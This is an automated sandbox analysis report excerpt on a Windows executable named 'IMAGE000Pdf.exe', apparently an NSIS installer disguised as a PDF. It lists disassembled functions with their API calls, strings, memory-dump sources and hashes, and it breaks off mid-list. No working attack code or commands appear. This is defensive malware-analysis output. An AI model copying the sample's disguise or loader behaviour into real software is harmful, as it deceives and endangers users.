%s%S.dll, xrefs: 004067BF
UXTHEME, xrefs: 0040677C

Memory Dump Source

Source File: 00000000.00000002.1803163466.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1803147864.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1803184970.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1803208835.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1803208835.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1803208835.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1803208835.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1803208835.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1803208835.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1803208835.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1803208835.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1803208835.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1803208835.00000000007DA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1803530559.00000000007DE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1803530559.000000000081E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_IMAGE000Pdf.jbxd

Similarity

API ID: DirectoryLibraryLoadSystemwsprintf
String ID: %s%S.dll$UXTHEME$\
API String ID: 2200240437-1946221925
Opcode ID: 70474fd7a4f9c0ba06a591290262a653731ba096fd3a0e6ffa6d52d828e9795f
Instruction ID: 038d7fed81a94acb9f8d17f6b302bf2205b26bc145b48260013954e6d266918a
Opcode Fuzzy Hash: 70474fd7a4f9c0ba06a591290262a653731ba096fd3a0e6ffa6d52d828e9795f
Instruction Fuzzy Hash: 65F0F670510119A7CF14AB64DD0DF9B376CAB40309F10047AA646F20D0EB7C9A68CBA8

Function 0040324C Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 161
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetTickCount.KERNEL32 ref: 004032B6
GetTickCount.KERNEL32 ref: 0040333A
MulDiv.KERNEL32(7FFFFFFF,00000064,00000000), ref: 00403363
wsprintfW.USER32 ref: 00403376

Strings

... %d%%, xrefs: 00403370

Memory Dump Source

Source File: 00000000.00000002.1803163466.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1803147864.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1803184970.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1803208835.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1803208835.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1803208835.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1803208835.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1803208835.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1803208835.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1803208835.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1803208835.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1803208835.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1803208835.00000000007DA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1803530559.00000000007DE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1803530559.000000000081E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_IMAGE000Pdf.jbxd

Similarity

API ID: CountTick$wsprintf
String ID: ... %d%%
API String ID: 551687249-2449383134
Opcode ID: a56becbd4a8c381964fcf942c118294a751433144615ef02c1157a4186d243db
Instruction ID: 008436f450556a42ebae23d461066e9f0811e1f15f23a2ec19415b9062137ceb
Opcode Fuzzy Hash: a56becbd4a8c381964fcf942c118294a751433144615ef02c1157a4186d243db
Instruction Fuzzy Hash: 86516C71900219DBDB11DF65DA84B9F7FB8AF0076AF14417BE814B72C1C7789A40CBAA

Function 00405F13 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 37
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetTickCount.KERNEL32 ref: 00405F31
GetTempFileNameW.KERNELBASE(?,?,00000000,?,?,?,"C:\Users\user\Desktop\IMAGE000Pdf.exe",004034A0,1033,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004036EC), ref: 00405F4C

Strings

"C:\Users\user\Desktop\IMAGE000Pdf.exe", xrefs: 00405F13
nsa, xrefs: 00405F20
C:\Users\user\AppData\Local\Temp\, xrefs: 00405F18

Memory Dump Source

Source File: 00000000.00000002.1803163466.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1803147864.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1803184970.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1803208835.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1803208835.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1803208835.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1803208835.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1803208835.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1803208835.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1803208835.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1803208835.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1803208835.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1803208835.00000000007DA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1803530559.00000000007DE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1803530559.000000000081E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_IMAGE000Pdf.jbxd

Similarity

API ID: CountFileNameTempTick
String ID: "C:\Users\user\Desktop\IMAGE000Pdf.exe"$C:\Users\user\AppData\Local\Temp\$nsa
API String ID: 1716503409-2772006944
Opcode ID: 418a87fb760587bef7583f4f3acae06d17b3011fc99645d3e11ea5bfcaa5fca8
Instruction ID: 2ec416300cd5d099b763d3688cd3c506487cb406e2025687db32897a35dea38d
Opcode Fuzzy Hash: 418a87fb760587bef7583f4f3acae06d17b3011fc99645d3e11ea5bfcaa5fca8
Instruction Fuzzy Hash: 84F09676B00204BBDB008F55ED05E9FB7ACEB95750F10803AEA04F7140E6B499548B58

Function 70021777 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 120
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 70021B5F: GlobalFree.KERNEL32(?), ref: 70021DD4
Part of subcall function 70021B5F: GlobalFree.KERNEL32(?), ref: 70021DD9
Part of subcall function 70021B5F: GlobalFree.KERNEL32(?), ref: 70021DDE

GlobalFree.KERNEL32(00000000), ref: 70021825
FreeLibrary.KERNEL32(?), ref: 700218AB
GlobalFree.KERNEL32(00000000), ref: 700218D0

Part of subcall function 7002239E: GlobalAlloc.KERNEL32(00000040,?), ref: 700223CF

Part of subcall function 70022770: GlobalAlloc.KERNEL32(00000040,00000000,?,?,00000000,?,?,?,700217F6,00000000), ref: 70022840

Part of subcall function 700215C6: wsprintfW.USER32 ref: 700215F4

Strings

, xrefs: 700218B1

Memory Dump Source

Source File: 00000000.00000002.1837307793.0000000070021000.00000020.00000001.01000000.00000006.sdmp, Offset: 70020000, based on PE: true

Associated: 00000000.00000002.1837286771.0000000070020000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1837323978.0000000070024000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1837342133.0000000070026000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_70020000_IMAGE000Pdf.jbxd

Similarity

API ID: Global$Free$Alloc$Librarywsprintf
String ID:
API String ID: 3962662361-3916222277
Opcode ID: 2beaaf8ecae96965096b713020965b3d8371fea7adf5c59a45d6d2d18d5e2b04
Instruction ID: 8848082d20bb060ddf0d2fa518ecca9d521afefbbc8d7f807cf56089fef5ec7f
Opcode Fuzzy Hash: 2beaaf8ecae96965096b713020965b3d8371fea7adf5c59a45d6d2d18d5e2b04
Instruction Fuzzy Hash: 90418E72400204AEDB119F70FCC5BDE37F9AB14B37F244169F9069A287DBB8A58587A0

Function 00405DCB Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 47
stringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 004063EE: lstrcpynW.KERNEL32(?,?,00000400,00403573,007A7A60,NSIS Error,?,00000007,00000009,0000000B), ref: 004063FB

Part of subcall function 00405D6E: CharNextW.USER32(?,?,C:\,?,00405DE2,C:\,C:\,?,?,C:\Users\user\AppData\Local\Temp\,00405B20,?,76F93420,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00405D7C
Part of subcall function 00405D6E: CharNextW.USER32(00000000), ref: 00405D81
Part of subcall function 00405D6E: CharNextW.USER32(00000000), ref: 00405D99

lstrlenW.KERNEL32(C:\,00000000,C:\,C:\,?,?,C:\Users\user\AppData\Local\Temp\,00405B20,?,76F93420,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00405E24
GetFileAttributesW.KERNELBASE(C:\,C:\,C:\,C:\,C:\,C:\,00000000,C:\,C:\,?,?,C:\Users\user\AppData\Local\Temp\,00405B20,?,76F93420,C:\Users\user\AppData\Local\Temp\), ref: 00405E34

Strings

C:\, xrefs: 00405DD1, 00405DD6, 00405DDC, 00405E1D, 00405E23, 00405E2B, 00405E33
C:\Users\user\AppData\Local\Temp\, xrefs: 00405DCB

Memory Dump Source

Source File: 00000000.00000002.1803163466.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1803147864.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1803184970.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1803208835.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1803208835.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1803208835.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1803208835.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1803208835.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1803208835.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1803208835.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1803208835.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1803208835.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1803208835.00000000007DA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1803530559.00000000007DE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1803530559.000000000081E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_IMAGE000Pdf.jbxd

Similarity

API ID: CharNext$AttributesFilelstrcpynlstrlen
String ID: C:\$C:\Users\user\AppData\Local\Temp\
API String ID: 3248276644-263117582
Opcode ID: cded0a6966890639b687aa66a4455a295a884498cbe0599bea4925404aa51844
Instruction ID: 3e737dd218ce82e1fa1fef2ae0b63742eeb13cb079fe623d21add3619189c6ea
Opcode Fuzzy Hash: cded0a6966890639b687aa66a4455a295a884498cbe0599bea4925404aa51844
Instruction Fuzzy Hash: B2F0A435104E5115D632333A9D09BEF1558CE86718B19863BF8A2B22D2DB3C8A539DBE

Function 004062BC Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 44
registryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RegQueryValueExW.KERNELBASE(?,?,00000000,00000000,?,00000800,00000002,007A0F28,00000000,?,?,Call,?,?,0040654B,80000002), ref: 00406302
RegCloseKey.KERNELBASE(?,?,0040654B,80000002,Software\Microsoft\Windows\CurrentVersion,Call,Call,Call,00000000,007A0F28), ref: 0040630D

Strings

Call, xrefs: 004062C3

Memory Dump Source

Source File: 00000000.00000002.1803163466.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1803147864.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1803184970.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1803208835.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1803208835.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1803208835.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1803208835.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1803208835.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1803208835.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1803208835.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1803208835.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1803208835.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1803208835.00000000007DA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1803530559.00000000007DE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1803530559.000000000081E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_IMAGE000Pdf.jbxd

Similarity

API ID: CloseQueryValue
String ID: Call
API String ID: 3356406503-1824292864
Opcode ID: 5e421e957683aa7155fe1e1f393967b6404614e05e15b89e99e168e2dc4a01c3
Instruction ID: 373679b9ec00f947e58de2b720fd419a4882b2706591ab80caa015ae1ce90e84
Opcode Fuzzy Hash: 5e421e957683aa7155fe1e1f393967b6404614e05e15b89e99e168e2dc4a01c3
Instruction Fuzzy Hash: 56017C72510209EADF218F65CC09EDB3BA8FF54364F01803AFD5AA2190D778D964DBA4

Function 004059D7 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 24
processCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateProcessW.KERNELBASE(00000000,?,00000000,00000000,00000000,04000000,00000000,00000000,007A4F50,Error launching installer), ref: 00405A00
CloseHandle.KERNEL32(?), ref: 00405A0D

Strings

Error launching installer, xrefs: 004059EA

Memory Dump Source

Source File: 00000000.00000002.1803163466.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1803147864.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1803184970.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1803208835.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1803208835.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1803208835.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1803208835.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1803208835.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1803208835.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1803208835.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1803208835.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1803208835.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1803208835.00000000007DA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1803530559.00000000007DE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1803530559.000000000081E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_IMAGE000Pdf.jbxd

Similarity

API ID: CloseCreateHandleProcess
String ID: Error launching installer
API String ID: 3712363035-66219284
Opcode ID: c4e46f1f673fd3826d078202ae771a3f9877dbb6e8e98e36d3575ddcb335b3d8
Instruction ID: 2b341ff16c6abf5d503a25303b32c86a9a78efd9c2a610832e0bce27d8c53e5f
Opcode Fuzzy Hash: c4e46f1f673fd3826d078202ae771a3f9877dbb6e8e98e36d3575ddcb335b3d8
Instruction Fuzzy Hash: F3E0BFF46002097FEB109F64ED05F7B77ACEB44644F004525BD54F6150D7B999148A7D

Function 00401389 Relevance: 3.0, APIs: 2, Instructions: 43windowCOMMON

Download Yara Rule

APIs

MulDiv.KERNEL32(00007530,00000000,00000000), ref: 004013E4
SendMessageW.USER32(00000402,00000402,00000000), ref: 004013F4

Memory Dump Source

Source File: 00000000.00000002.1803163466.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1803147864.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1803184970.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1803208835.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1803208835.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1803208835.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1803208835.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1803208835.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1803208835.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1803208835.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1803208835.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1803208835.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1803208835.00000000007DA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1803530559.00000000007DE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1803530559.000000000081E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_IMAGE000Pdf.jbxd

Similarity

API ID: MessageSend
String ID:
API String ID: 3850602802-0
Opcode ID: 450ddb0a52dde23e6c3e7e65707e0a17b99b7c6dada291b67ac9213214883537
Instruction ID: 3e9f44f44444eb33be3e1f1d809517d1ef13f380758e007b8d3e22890c14ce30
Opcode Fuzzy Hash: 450ddb0a52dde23e6c3e7e65707e0a17b99b7c6dada291b67ac9213214883537
Instruction Fuzzy Hash: 0301F432624220ABE7195B389D05B2A3698E751318F10C13FF855F6AF1EA78CC02DB4D

Function 004067E3 Relevance: 3.0, APIs: 2, Instructions: 22libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleA.KERNEL32(?,00000020,?,00403514,0000000B), ref: 004067F5
GetProcAddress.KERNEL32(00000000,?), ref: 00406810

Part of subcall function 00406773: GetSystemDirectoryW.KERNEL32(?,00000104), ref: 0040678A
Part of subcall function 00406773: wsprintfW.USER32 ref: 004067C5
Part of subcall function 00406773: LoadLibraryExW.KERNEL32(?,00000000,00000008), ref: 004067D9

Memory Dump Source

Source File: 00000000.00000002.1803163466.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1803147864.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1803184970.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1803208835.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1803208835.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1803208835.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1803208835.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1803208835.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1803208835.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1803208835.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1803208835.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1803208835.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1803208835.00000000007DA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1803530559.00000000007DE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1803530559.000000000081E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_IMAGE000Pdf.jbxd

Similarity

API ID: AddressDirectoryHandleLibraryLoadModuleProcSystemwsprintf
String ID:
API String ID: 2547128583-0
Opcode ID: 04b739db586b670126c7119b566f03dd1efc4ec82adb23a6bbf3e60323b3d7ce
Instruction ID: 99a4bc67a8c43757839ce5658996565e88f4cb2ecc15aeea03f34014f97f3c52
Opcode Fuzzy Hash: 04b739db586b670126c7119b566f03dd1efc4ec82adb23a6bbf3e60323b3d7ce
Instruction Fuzzy Hash: F2E0863350521056E611AA719D44C7773AC9F89650307843EF946F2080D738DC31ABBD

Function 00405EE4 Relevance: 3.0, APIs: 2, Instructions: 16fileCOMMON

Download Yara Rule

APIs

GetFileAttributesW.KERNELBASE(?,00403055,C:\Users\user\Desktop\IMAGE000Pdf.exe,80000000,00000003,?,00000007,00000009,0000000B), ref: 00405EE8
CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,00000007,00000009,0000000B), ref: 00405F0A

Memory Dump Source

Source File: 00000000.00000002.1803163466.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1803147864.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1803184970.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1803208835.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1803208835.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1803208835.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1803208835.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1803208835.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1803208835.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1803208835.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1803208835.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1803208835.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1803208835.00000000007DA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1803530559.00000000007DE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1803530559.000000000081E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_IMAGE000Pdf.jbxd

Similarity

API ID: File$AttributesCreate
String ID:
API String ID: 415043291-0
Opcode ID: 080dfadfdaad2818d5b04c51cfada36c475993ea7ffea5996e238fb5a0e3a6c4
Instruction ID: 1030bc0f2bf25390ef9c6131bda9d6cfedcac9e68b753c15eded60bf4a570351
Opcode Fuzzy Hash: 080dfadfdaad2818d5b04c51cfada36c475993ea7ffea5996e238fb5a0e3a6c4
Instruction Fuzzy Hash: 5ED09E31254201AFEF098F20DE16F2E7BA2EB94B04F11552CB786941E0DAB15C199B15

Function 004059A2 Relevance: 3.0, APIs: 2, Instructions: 9COMMON

Download Yara Rule

APIs

CreateDirectoryW.KERNELBASE(?,00000000,00403495,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004036EC,?,00000007,00000009,0000000B), ref: 004059A8
GetLastError.KERNEL32(?,00000007,00000009,0000000B), ref: 004059B6

Memory Dump Source

Source File: 00000000.00000002.1803163466.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1803147864.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1803184970.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1803208835.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1803208835.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1803208835.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1803208835.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1803208835.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1803208835.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1803208835.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1803208835.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1803208835.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1803208835.00000000007DA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1803530559.00000000007DE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1803530559.000000000081E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_IMAGE000Pdf.jbxd

Similarity

API ID: CreateDirectoryErrorLast
String ID:
API String ID: 1375471231-0
Opcode ID: a5afa482e644e9a10fedfab033ae5dbb8931bf23a9e1c5533d9f8c1a63861871
Instruction ID: 379133542b1e1e7011c0d69b4b2ae41cc98c6aec5a22f3063a42931ced3e53c7
Opcode Fuzzy Hash: a5afa482e644e9a10fedfab033ae5dbb8931bf23a9e1c5533d9f8c1a63861871
Instruction Fuzzy Hash: 1EC04C71205502EEF6115B20DF48B1B7A909B50751F16843DA146E01E4DE389455D92D

Function 00405F67 Relevance: 1.5, APIs: 1, Instructions: 22fileCOMMON

Download Yara Rule

APIs

ReadFile.KERNELBASE(00000000,00000000,00000004,00000004,00000000,?,?,00403457,00000000,00000000,0040329E,?,00000004,00000000,00000000,00000000), ref: 00405F7B

Memory Dump Source

Source File: 00000000.00000002.1803163466.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1803147864.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1803184970.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1803208835.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1803208835.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
